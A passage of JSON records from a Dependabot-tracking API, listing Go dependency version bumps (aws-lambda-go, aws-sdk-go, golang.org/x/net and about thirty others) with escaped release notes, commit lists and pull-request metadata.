notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-lambda-go/releases\"\u003egithub.com/aws/aws-lambda-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.54.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow ClientContext.Custom unmarshaling for non-string (JSON) values by \u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/M-Elsaeed\"\u003e\u003ccode\u003e@​M-Elsaeed\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/620\"\u003eaws/aws-lambda-go#620\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.54.0...v1.53.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.53.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd S3 event optional fields by \u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate workflows for go 1.26 by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/617\"\u003eaws/aws-lambda-go#617\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix spelling typos by \u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for Cognito Inbound federation Lambda trigger by \u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yhamano0312\"\u003e\u003ccode\u003e@​yhamano0312\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/612\"\u003eaws/aws-lambda-go#612\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magnetikonline\"\u003e\u003ccode\u003e@​magnetikonline\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/616\"\u003eaws/aws-lambda-go#616\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maximrub\"\u003e\u003ccode\u003e@​maximrub\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/619\"\u003eaws/aws-lambda-go#619\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.53.0...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.52.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elambdacontext\u003c/code\u003e feature: Adding structured logging helper by \u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anzheyazzz\"\u003e\u003ccode\u003e@​anzheyazzz\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/614\"\u003eaws/aws-lambda-go#614\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.2...v1.52.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: always return PhysicalResourceID for CFn CustomResources by \u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Youssef-Beltagy\"\u003e\u003ccode\u003e@​Youssef-Beltagy\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/613\"\u003eaws/aws-lambda-go#613\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.1...v1.51.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003edocumentation rework by \u003ca href=\"https://github.com/bmoffatt\"\u003e\u003ccode\u003e@​bmoffatt\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/pull/608\"\u003eaws/aws-lambda-go#608\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ca19f6ff85c6e7e87430d86d98d64a2d461dbabf\"\u003e\u003ccode\u003eca19f6f\u003c/code\u003e\u003c/a\u003e Allow ClientContext.Custom unmarshaling for non-string (JSON) values (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9c32960087517ddf57e3d405fae5e8e5e730f4cc\"\u003e\u003ccode\u003e9c32960\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/619\"\u003e#619\u003c/a\u003e from maximrub/inbound-federation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ebe38d988fd6f254f2c818c1bd12e15df52577f3\"\u003e\u003ccode\u003eebe38d9\u003c/code\u003e\u003c/a\u003e add support for Cognito Inbound federation Lambda trigger\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/71624ac50ffdcb73bce436c791caadfb468a8abc\"\u003e\u003ccode\u003e71624ac\u003c/code\u003e\u003c/a\u003e Fix spelling typos (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/616\"\u003e#616\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/33e4dc3007f6898e4031ac3b04520a21c0a4fb8c\"\u003e\u003ccode\u003e33e4dc3\u003c/code\u003e\u003c/a\u003e Update workflows for go 1.26 (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/617\"\u003e#617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/e1cb4611fc8ef22a40196b19651a33487b846a01\"\u003e\u003ccode\u003ee1cb461\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/612\"\u003e#612\u003c/a\u003e from yhamano0312/feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/a66ce2dc84f235c83f927524f218a106aa3f0c93\"\u003e\u003ccode\u003ea66ce2d\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9dac8a59d3d97d63314ac5ffc7d12475eaa0a76a\"\u003e\u003ccode\u003e9dac8a5\u003c/code\u003e\u003c/a\u003e Add structured logging helper (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/614\"\u003e#614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/6252f73f51494b482a1ff1b21b84bb764add35b2\"\u003e\u003ccode\u003e6252f73\u003c/code\u003e\u003c/a\u003e fix: always return PhysicalResourceID for CFn CustomResources (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/613\"\u003e#613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/be52e48b133401d28c9f19b746989c4f1458b816\"\u003e\u003ccode\u003ebe52e48\u003c/code\u003e\u003c/a\u003e feat: add lifecycle event data structure and corresponding test for S3 events\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.49.0...v1.54.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `golang.org/x/net` from 0.42.0 to 0.50.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/ebddb99633e0fc35d135f62e9400678492c1d3be\"\u003e\u003ccode\u003eebddb99\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/4a490d4f5331699af2b0987af2e4cea9925f65af\"\u003e\u003ccode\u003e4a490d4\u003c/code\u003e\u003c/a\u003e internal/http3: add Expect: 100-continue support to ClientConn\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/73fe7011adb0a690693f0318325c60d477c7bb3a\"\u003e\u003ccode\u003e73fe701\u003c/code\u003e\u003c/a\u003e internal/http3: add Expect: 100-continue support to Server\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/af0c9df79dbe35108ead105e4ca28133551e4d1a\"\u003e\u003ccode\u003eaf0c9df\u003c/code\u003e\u003c/a\u003e html: add NodeType.String() method\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/e02fb33933734f5c17f8474ef9f54461e776d119\"\u003e\u003ccode\u003ee02fb33\u003c/code\u003e\u003c/a\u003e internal/http3: make responseWriter.Flush write headers if not done yet\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/da558ff100e05eb3fd3c94d2f978c062edc070a2\"\u003e\u003ccode\u003eda558ff\u003c/code\u003e\u003c/a\u003e internal/http3: ensure bodyReader cannot be read after being closed\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/d7c76faf077586c8657a8bdd404484c090764e2b\"\u003e\u003ccode\u003ed7c76fa\u003c/code\u003e\u003c/a\u003e internal/http3: make responseWriter behave closer to other http.ResponseWriter\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/64b3af9625ad94ce3f68ac1ab80733f691a49319\"\u003e\u003ccode\u003e64b3af9\u003c/code\u003e\u003c/a\u003e http2: prevent transport deadlock due to WINDOW_UPDATE that exceeds limit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/1973e8da2d578cd964f4c1df41ed8c553f1e17b7\"\u003e\u003ccode\u003e1973e8d\u003c/code\u003e\u003c/a\u003e internal/http3: add Server support for handling HEAD requests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/57ea86db083ff804aa7dfca3489c0f965ab3b0da\"\u003e\u003ccode\u003e57ea86d\u003c/code\u003e\u003c/a\u003e icmp, internal/socket, ipv4, ipv6: use binary.NativeEndian\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang/net/compare/v0.42.0...v0.50.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e","html_url":"https://github.com/imposter-project/imposter-go/pull/53","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/imposter-project%2Fimposter-go/issues/53","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/53/packages"}},{"old_version":"1.55.7","new_version":"1.55.8","update_type":"patch","path":null,"pr_created_at":"2026-03-30T23:13:58.000Z","version_change":"1.55.7 → 1.55.8","issue":{"uuid":"4174607992","node_id":"PR_kwDOCdvj-c7Ox7b9","number":7873,"state":"closed","title":"dev: bump the safe group across 1 directory with 40 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-06T22:55:21.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-30T23:13:58.000Z","updated_at":"2026-04-06T22:55:23.000Z","time_to_close":603683,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"dev: bump","group_name":"safe","update_count":40,"packages":[{"name":"github.com/KimMachineGun/automemlimit","old_version":"0.7.4","new_version":"0.7.5","repository_url":"https://github.com/KimMachineGun/automemlimit"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.29.12","new_version":"1.32.13","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/s3","old_version":"1.78.2","new_version":"1.97.3","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/coder/websocket","old_version":"1.8.13","new_version":"1.8.14","repository_url":"https://github.com/coder/websocket"},{"name":"github.com/eclipse/paho.mqtt.golang","old_version":"1.5.0","new_version":"1.5.1","repository_url":"https://github.com/eclipse/paho.mqtt.golang"},{"name":"github.com/emersion/go-smtp","old_version":"0.22.0","new_version":"0.24.0","repository_url":"https://github.com/emersion/go-smtp"},{"name":"github.com/envoyproxy/protoc-gen-validate","old_version":"1.2.1","new_version":"1.3.3","repository_url":"https://github.com/envoyproxy/protoc-gen-validate"},{"name":"github.com/getsentry/sentry-go","old_version":"0.34.1","new_version":"0.44.1","repository_url":"https://github.com/getsentry/sentry-go"},{"name":"github.com/jackc/pgx/v5","old_version":"5.7.5","new_version":"5.9.1","repository_url":"https://github.com/jackc/pgx"},{"name":"github.com/jarcoal/httpmock","old_version":"1.4.0","new_version":"1.4.1","repository_url":"https://github.com/jarcoal/httpmock"},{"name":"github.com/klauspost/compress","old_version":"1.18.0","new_version":"1.18.5","repository_url":"https://github.com/klauspost/compress"},{"name":"github.com/lib/pq","old_version":"1.10.9","new_version":"1.12.1","repository_url":"https://github.com/lib/pq"},{"name":"github.com/nats-io/nats-server/v2","old_version":"2.11.4","new_version":"2.12.6","repository_url":"https://github.com/nats-io/nats-server"},{"name":"github.com/prometheus/client_golang","old_version":"1.22.0","new_version":"1.23.2","repository_url":"https://github.com/prometheus/client_golang"},{"name":"github.com/redis/go-redis/v9","old_version":"9.11.0","new_version":"9.18.0","repository_url":"https://github.com/redis/go-redis"},{"name":"github.com/spf13/cast","old_version":"1.9.2","new_version":"1.10.0","repository_url":"https://github.com/spf13/cast"},{"name":"github.com/spf13/cobra","old_version":"1.9.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/spf13/viper","old_version":"1.20.1","new_version":"1.21.0","repository_url":"https://github.com/spf13/viper"},{"name":"github.com/throttled/throttled/v2","old_version":"2.13.0","new_version":"2.15.0","repository_url":"https://github.com/throttled/throttled"},{"name":"github.com/uptrace/bun","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"github.com/uptrace/bun/dialect/pgdialect","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"github.com/uptrace/bun/driver/pgdriver","old_version":"1.2.14","new_version":"1.2.18","repository_url":"https://github.com/uptrace/bun"},{"name":"go.opentelemetry.io/contrib/instrumentation/github.com/gorilla/mux/otelmux","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp","old_version":"0.62.0","new_version":"0.67.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go-contrib"},{"name":"go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc","old_version":"1.37.0","new_version":"1.42.0","repository_url":"https://github.com/open-telemetry/opentelemetry-go"},{"name":"go.thethings.network/lorawan-stack-legacy/v2","old_version":"2.1.0","new_version":"2.1.1","repository_url":"https://github.com/TheThingsNetwork/lorawan-stack"},{"name":"go.uber.org/zap","old_version":"1.27.0","new_version":"1.27.1","repository_url":"https://github.com/uber-go/zap"},{"name":"golang.org/x/oauth2","old_version":"0.35.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"}],"path":null,"ecosystem":"go"},"body":"Bumps the safe group with 30 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/KimMachineGun/automemlimit](https://github.com/KimMachineGun/automemlimit) | `0.7.4` | `0.7.5` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.29.12` | `1.32.13` |\n| [github.com/aws/aws-sdk-go-v2/service/s3](https://github.com/aws/aws-sdk-go-v2) | `1.78.2` | `1.97.3` |\n| [github.com/coder/websocket](https://github.com/coder/websocket) | `1.8.13` | `1.8.14` |\n| [github.com/eclipse/paho.mqtt.golang](https://github.com/eclipse/paho.mqtt.golang) | `1.5.0` | `1.5.1` |\n| [github.com/emersion/go-smtp](https://github.com/emersion/go-smtp) | `0.22.0` | `0.24.0` |\n| [github.com/envoyproxy/protoc-gen-validate](https://github.com/envoyproxy/protoc-gen-validate) | `1.2.1` | `1.3.3` |\n| [github.com/getsentry/sentry-go](https://github.com/getsentry/sentry-go) | `0.34.1` | `0.44.1` |\n| [github.com/jackc/pgx/v5](https://github.com/jackc/pgx) | `5.7.5` | `5.9.1` |\n| [github.com/jarcoal/httpmock](https://github.com/jarcoal/httpmock) | `1.4.0` | `1.4.1` |\n| [github.com/klauspost/compress](https://github.com/klauspost/compress) | `1.18.0` | `1.18.5` |\n| [github.com/lib/pq](https://github.com/lib/pq) | `1.10.9` | `1.12.1` |\n| [github.com/nats-io/nats-server/v2](https://github.com/nats-io/nats-server) | `2.11.4` | `2.12.6` |\n| [github.com/prometheus/client_golang](https://github.com/prometheus/client_golang) | `1.22.0` | `1.23.2` |\n| [github.com/redis/go-redis/v9](https://github.com/redis/go-redis) | `9.11.0` | `9.18.0` |\n| [github.com/spf13/cast](https://github.com/spf13/cast) | `1.9.2` | `1.10.0` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.9.1` | `1.10.2` |\n| [github.com/spf13/viper](https://github.com/spf13/viper) | `1.20.1` | `1.21.0` |\n| [github.com/throttled/throttled/v2](https://github.com/throttled/throttled) | `2.13.0` | `2.15.0` |\n| [github.com/uptrace/bun](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [github.com/uptrace/bun/dialect/pgdialect](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [github.com/uptrace/bun/driver/pgdriver](https://github.com/uptrace/bun) | `1.2.14` | `1.2.18` |\n| [go.opentelemetry.io/contrib/instrumentation/github.com/gorilla/mux/otelmux](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp](https://github.com/open-telemetry/opentelemetry-go-contrib) | `0.62.0` | `0.67.0` |\n| [go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc](https://github.com/open-telemetry/opentelemetry-go) | `1.37.0` | `1.42.0` |\n| [go.thethings.network/lorawan-stack-legacy/v2](https://github.com/TheThingsNetwork/lorawan-stack) | `2.1.0` | `2.1.1` |\n| [go.uber.org/zap](https://github.com/uber-go/zap) | `1.27.0` | `1.27.1` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.35.0` | `0.36.0` |\n\n\nUpdates `github.com/KimMachineGun/automemlimit` from 0.7.4 to 0.7.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/KimMachineGun/automemlimit/releases\"\u003egithub.com/KimMachineGun/automemlimit's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(memlimit): respect parent cgroup limits in v2 (\u003ca href=\"https://redirect.github.com/KimMachineGun/automemlimit/issues/31\"\u003eKimMachineGun/automemlimit#31\u003c/a\u003e) by \u003ca href=\"https://github.com/KimMachineGun\"\u003e\u003ccode\u003e@​KimMachineGun\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\"\u003ehttps://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\"\u003ehttps://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/KimMachineGun/automemlimit/commit/6d12049dcf3e429d3aeab23c3dd57ee4ce610292\"\u003e\u003ccode\u003e6d12049\u003c/code\u003e\u003c/a\u003e fix(memlimit): respect parent cgroup limits in v2 (\u003ca href=\"https://redirect.github.com/KimMachineGun/automemlimit/issues/31\"\u003e#31\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/KimMachineGun/automemlimit/compare/v0.7.4...v0.7.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 